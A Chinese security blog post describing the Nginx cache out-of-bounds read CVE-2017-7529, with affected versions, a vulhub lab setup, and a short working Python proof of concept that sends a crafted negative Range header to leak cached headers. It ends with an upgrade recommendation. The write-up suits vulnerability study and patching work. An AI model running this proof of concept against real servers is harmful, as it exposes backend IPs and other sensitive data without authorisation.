Nginx越界读取缓存漏洞 CVE-2017-7529

admin 2022年7月11日22:20:40安全漏洞评论11 views1093字阅读3分38秒阅读模式

1.漏洞描述

Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。

如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。

2.影响版本

Nginx version 0.5.6 - 1.13.2

3.环境搭建

git clone https://github.com/vulhub/vulhub.git cd vulhub/nginx/CVE-2017-7529 docker-compose up -d

Nginx越界读取缓存漏洞 CVE-2017-7529

Nginx越界读取缓存漏洞 CVE-2017-7529

访问127.0.0.1:8080

Nginx越界读取缓存漏洞 CVE-2017-7529

4.漏洞复现

使用POC 进行验证

python poc.py http://xxx.xxx.xxx.xxx:8080/

Nginx越界读取缓存漏洞 CVE-2017-7529

5.漏洞POC

#!/usr/bin/env python
import sys
import requests

if len(sys.argv) < 2:
   print("%s url" % (sys.argv[0]))
   print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
   sys.exit()

headers = {
   'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
   n, 0x8000000000000000 - n)

r = requests.get(url, headers=headers)

6.漏洞修复建议

攻击者通过利用该漏洞可以拿到服务器的后端真实IP或其他敏感信息,建议通过升级版本及时修复此漏洞



原文始发于微信公众号(红豆芷浠):Nginx越界读取缓存漏洞 CVE-2017-7529

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月11日22:20:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Nginx越界读取缓存漏洞 CVE-2017-7529 http://cn-sec.com/archives/1169268.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: